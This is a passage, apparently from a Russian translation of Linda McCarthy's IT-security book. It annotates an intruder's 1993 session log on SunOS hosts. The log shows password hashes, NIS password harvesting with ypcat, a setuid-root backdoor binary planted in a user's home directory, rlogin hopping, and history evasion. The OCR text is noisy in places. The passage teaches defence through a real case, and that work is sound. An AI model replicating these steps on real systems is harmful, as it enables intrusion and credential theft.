Линда Маккарти - IT-безопасность - стоит ли рисковать корпорацией?

193 sync::1:1::/:/bin/sync

194 sysdiag:*:0;1:Old System Diag:/usr/diag/sysdiag:/usr/diag/ sysdiag/sysdiag

sundiag:*:0:1:System Diag:/usr/diag/su ndiag:/usr/diag/

sundiag/ sundiag

195 operator: INtDk7crldKh2:5:5 — Account forbackups;/usr/ backup: /bin/csh

196 lc:u0gFO1zE9Yx9U:27:50:LC Calendar:/var/lc:/bin/csh

197+::0;0:::

Строки с № 198 по № 209

Хакер меняет ID пользователя с суперпользователя обратно на jeff. Затем он повторно проверяет свой ID пользователя и начинает менять имя своего a.out на такое, которое он не забудет (как он уже прежде делал). Снова он запускает команду ls -1 для получения списка с новейшими файлами в начале его.

Строки с № 210 по № 212

Он удаляет свою локальную копию файла паролей NIS ("ааа"). Он уже скопировал этот файл на хост valley, поэтому здесь он ему не нужен. Затем удаляет свой исполняемый код и готов идти дальше.

Строки с № 213 по № 227

Хакер проверяет, какие файловые системы подмонтированы.

198 #4)

199 # id

200 uid=4401 (jeff) gid=50(iastaff) euid=0(root) groups=50(lastaff)

201 # тс^С

202 # mv^С

203 #mv a.out shit

204 # Is — tal

205 total 2415

206 drwxrwsrwx 3 bin 1024 Jan 18 23:12.

207 — rwsrwsrwx 1 root 24576 Jan 18 23:11 shit

208-rw-r-r- 1 root 61 Jan 18 23:11 c.c

209 — rw-r-r- 1 jeff 15382 Jan 18 23:09 aaa

210#rmaaa

211 #rmc.c

212 rm: override protection 644 for c.c? у

213 #df

214 Filesystem kbytes used avail capacity Mounted on

215 /dev/sdOa 10483 5081 4354 54 % /

216 /dev/sdOg 96943 78335 8914 90 % /usr

217 /dev/sdOe 22927 3111 17524 15 %/var

218 /dev/sd1h 1255494 1081249 48696 96 % /home

219 /dev/sd3h 1255494 1030386 99559 91 % /home/se

220 la:/usr/local 2097151 1154033 692365 63 % /usr/local

221 suntzu:/var/spool/mail

222 445852 334295 66972 83 % /var/spool/mail

223 mfp:/home/sybase 318991 244337 42755 85 % /home/sybase

224 арр1:/export/sun/sun4/openwin-3,0

225 189858 131073 39799 77 % /usr/openwin

226 арр1:/export/apps 1255494 771887 358057 68 % /export/apps

227 appl:/export/apps 1255494 771887 358057 68 % /usr/local

Строки с № 228 по № 229

Неверный ввод или, возможно шумы в линии.

Строки с № 230 по № 258

Хакер ищет личные каталоги пользователей, находит каталог wendy и становится пользователем wendy. Но ненадолго, потому что по каким-то причинам он решает поискать пользователя dan. Вероятно, хакер уже знает, что dan существует.

228 # irG-cd /home/se

229 irG-cd: not found

230 # cd/home/se

231 # Is

232 cmeyer hamant lost+found mikec wendy

233 colleen Joseph mark mikep

234 derek kevin matthews neally

235 # cd wendy

236 # cp Дтр/shit.

237 # Is — tal shit

238 — rwxr-xr-x 1 root 24576 Jan 18 23:13 shit

239 # chmod 6777 shit

240 # Is — tal shit

241 — rwsrwsrwx 1 root 24576 Jan 18 23:13 shit

242 # pwd

243 /home/se/wendy

244 # cd Amp

245 # Is — tal | more

246 total 2398

247 drwxrwsrwx 3 bin 1024 Jan 18 23:13.

248 — rwsrwsrwx 1 root 24576 Jan 18 23:11 shit

249 — rwxr-xr-x 1 cmeyer 41 Jan 13 12:31 junk

250-rw-r-r- 1 cmeyer 12 Jan 13 12:05 junk.dat

251 — rw-r-r- 1 derek 0 Jan 12 16:07 6310

252 (16 строк вывода удалены и хакер стал пользователем wendy)

253 hacker typos

254 # rm shit

255 # grep dan/etc/passwd

256 # ypcat passwd | grep dan

257danf:*:13602:50::/home/guest/danf:/bin/csh

258 dan:*H.6Haolt2xDu2:13601:50:&:/home/guest/dan:/bin/csh

Строки с № 259 по № 263

Еще несколько тревожных взглядов вокруг (с помощью who).

Строки с № 264 по № 273

Он снова превращается в jeff. Очевидно, что реальный jeff был в системе немного раньше хакера, который входит сейчас в suntzu как jeff. И снова пароля не требуется.

Строка № 274

Другая смена оболочки, чтобы не оставлять отметки о себе в журналах history.

Строки с № 275 по № 281

Хакер пытается убедиться, что /home/se подмонтирован из хоста tsunami. (Если вы помните, в /home/se/wendy он оставил свой исполняемый код. Ему это было нужно для получения доступа с правами суперпользователя к этому новому хосту.)

259 # who

260 wendy ttyp2 Jan 6 13:55 (arawana)

261 derekttyp3Jan 13 17:57 (lajolla)

262 derek ttyp4 Jan 15 13:11 (lajolla)

263 jeff ttyp5 Jan 18 23:09 (valley)

264 #T>

265 $ id

266 uid=4401(jeff) gid=50(lastaff) groups=50(lastaff)

267 $ rlogin suntzu

268 Last login: Thu Jan 14 06:35:30 on ttyhl

269 SunOS Release 4.1.2 (SUNTZU.X) #2: Fri Oct 23 22:25:48 PDT 1992

270 You have new mail.

271 suntzu% who

272 jeff ttyp0 Jan 18 23:14

273 (tsunami)

274 suntzu% sh

275 $ df

276 Filesystem kbytes used avail capacity Mounted on

277 /dev/sd6a 14983 11056 2429 82 % /

278 /dev/sd6g 91998 76365 6434 92 % /usr

279 /dev/sd6h 445852 334297 66970 83 % /var

280 /dev/sd4c 1255494 1030410 99535 91 % /home/se

281 tsunami:/home/se 1255494 1030410 99535 91 % Ampjnnt/ home/se

Строки с № 282 по № 287

Хакер применяет свой исполняемый код и получает права суперпользователя на доступ к системе suntzu. В итоге он уже скомпрометировал три системы.

Строки с № 288 по № 292

Он снова ищет пароли. (Кажется, это становится уже знакомым?)

Строки с № 293 по № 317

Хакер переходит к гостевому личному каталогу и выводит список его содержимого. Он замечает в личном каталоге файл под именем dan/test.

Строка № 318

Я удалила несколько строк из соображений конфиденциальности.

282 $ cd /home/se/wendy

283 $ Is — tal shit

284 — rwsrwsrwx 1 root 24576 Jan 18 23:13 shit

285 $./shit

286 # id

287 uid=0(root) gid=0(wheel) groups=50(lastaff)

288 # Is — tal /etcfass*

289 — rw-r-r-1 root 15465 Jan 1514:29/etc/passwd

290 — rw-r-r-1 root 15462 Dec 28 17:58/etc/passwd.OLD

291 — rw-r-r-1 root 15514 Nov 12 18:58/etc/passwd.old

292 — rw-r-r-1 root 15215 Sep 9 10:02 /etc/passwd-